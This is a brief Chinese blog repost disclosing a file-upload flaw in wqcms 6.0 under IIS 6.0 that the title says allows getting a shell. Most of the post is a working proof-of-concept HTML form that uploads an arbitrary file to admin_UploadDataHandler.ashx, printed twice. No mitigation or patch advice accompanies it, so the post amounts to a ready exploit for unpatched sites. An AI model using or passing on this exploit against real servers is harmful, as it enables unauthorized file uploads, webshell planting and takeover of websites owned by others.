wqcms6.0构造上传getshell(仅限IIS6.0)

  • A+
所属分类:颓废's Blog
摘要

漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点
poc: <html> <body> <form action=”http://127.0.0.1/admin_UploadDataHandler.ashx” method=”POST”enctype=”multipart/form-data”> <input type=”file” name=”uploadify” /> <input type=”text” name=”saveFile” value=”admin” /> <input type=”submit” name=”Upload” value=”Submit Query” /> </form> </body> </html>

漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点

wqcms6.0构造上传getshell(仅限IIS6.0)

wqcms6.0构造上传getshell(仅限IIS6.0)

poc:

<html>     <body>         <form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">             <input  type="file" name="uploadify" />             <input  type="text" name="saveFile" value="admin" />             <input type="submit" name="Upload" value="Submit Query" />         </form>     </body> </html>

转自群友论坛

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: